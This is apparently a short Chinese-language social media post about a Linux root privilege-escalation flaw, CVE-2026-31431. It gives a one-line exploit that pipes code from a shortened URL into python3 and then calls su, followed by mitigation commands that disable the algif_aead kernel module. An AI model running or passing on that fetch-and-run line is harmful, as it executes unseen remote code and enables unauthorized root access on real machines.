看到Xint Code研究团队放出的CVE-2026-31431简直是王炸,换句话说通杀所有Linux发行版,致使低权限账户获得root权限:
curl https://t.co/eApW9Zczy5 | python3 && su CVE-2026-31431
建议尽快更新系统,事态紧急可以先打个补丁
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif-aead.conf
rmmod algif_aead 2>/dev/null
详细参考👉 https://t.co/iezazdMpAT
点击图片查看原图